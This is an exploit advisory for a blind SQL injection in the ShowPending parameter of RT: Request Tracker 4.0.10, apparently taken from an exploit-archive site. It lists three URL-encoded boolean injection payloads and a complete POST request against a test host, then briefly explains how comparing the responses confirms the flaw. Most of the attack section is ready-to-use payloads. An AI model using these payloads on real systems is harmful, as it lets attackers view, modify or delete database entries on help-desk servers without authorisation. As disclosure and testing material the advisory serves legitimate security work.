Home / exploitsPDF  

RT: Request Tracker 4.0.10 SQL Injection

Posted on 11 April 2013

# Exploit Title: - SQL-Injection - RT: Request Tracker System
# Date: 10/05/2013
# Exploit Author: cheki
# Vendor Homepage: http://bestpractical.com/rt/
# Version: RT 4.0.10
# Tested on: Kali Linux

########################################################################################
URL: http://10.10.10.70/Approvals/
Entity: ShowPending (Parameter) 
Risk: It is possible to view, modify or delete database entries and tables
Causes: Sanitation of hazardous characters was not performed correctly on user input
Fix: Review possible solutions for hazardous character injection

#Description: Blind SQL Injection: append Boolean True/False string expressions, using apostrophes
and commenting out the rest of the query.
#The following changes were applied the original request
1) Set parameter 'ShowPending's value to '1%27+and+%27f%27%3D%27f%27%29+--+'
2) Set parameter 'ShowPending's value to '1%27+and+%27b%27%3D%27f%27%29+--'
3) Set parameter 'ShowPending's value to '1%27+or+%27b%27%3D%27f%27%29+--'

POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://10.10.10.70/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=

#########################################################################################
Reasoning: The test result seems to indicate a vulnerability because it shows that values 
can be appended to parameter values,  indicating that they were embedded in an SQL query.HEX(0D)HEX(0A)In 
this test, three (or sometimes four) requests are  sent. The last is logically equal to the original, and the 
next­to­last is different. Any others are for control purposes. A  comparison of the last two responses with 
the first (the last is similar to it, and the next­to­last is different) indicates that  the application is vulnerable.

Home Page: securitylabnews.blogspot.com

 

TOP

Malware :

Exploits :